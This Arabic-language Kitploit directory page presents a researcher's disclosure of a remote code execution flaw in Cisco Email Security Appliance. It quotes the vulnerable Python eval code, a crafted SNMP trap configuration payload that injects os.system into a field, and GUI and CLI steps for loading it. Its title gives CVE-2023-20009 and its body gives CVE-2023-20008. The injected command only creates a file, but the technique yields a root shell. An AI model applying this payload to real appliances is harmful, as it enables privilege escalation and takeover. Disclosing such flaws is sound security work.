Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: تنفيذ التعليمات البرمجية عن بُعد - RCE من ملف التكوين | Kitploit
أدوات/GitHubGitHub/ly1g3/cisco-cve-2023-20009
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: تنفيذ التعليمات البرمجية عن بُعد - RCE من ملف التكوين

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حول

باحث أمني: ly1g3، ly1g3[at]tuta.io

بصمة GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

نظرة عامة: تنفيذ التعليمات البرمجية عن بُعد - RCE من ملف الإعدادات

CVE: CVE-2023-20008

الجدول الزمني:

  • الاكتشاف - ly1g3
  • الإبلاغ - ly1g3
  • الإصلاح - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) و Cisco Secure Email and Web Manager

تصعيد الامتيازات - شل الجذر

يمكن لمستخدم مصادق عليه يمتلك صلاحيات على SNMP-config تنفيذ كود عشوائي بصلاحيات الجذر باستخدام إعداد SNMP trap مُعد خصيصًا.

تقني

الكود المستغل ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v سيحتوي على قيمة common_trap.common_configuration

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

خطوات التشغيل باستخدام WEB-GUI:

  1. https://192.168.1.10/system_administration/configuration_file
  2. "تحميل ملف إعدادات من الكمبيوتر المحلي"
  3. استبدال حقل connectivityFailure الحالي بالحمولة أعلاه

خطوات التشغيل باستخدام CLI

  1. loadconfig
  2. الصق الحمولة
تنزيل الأداة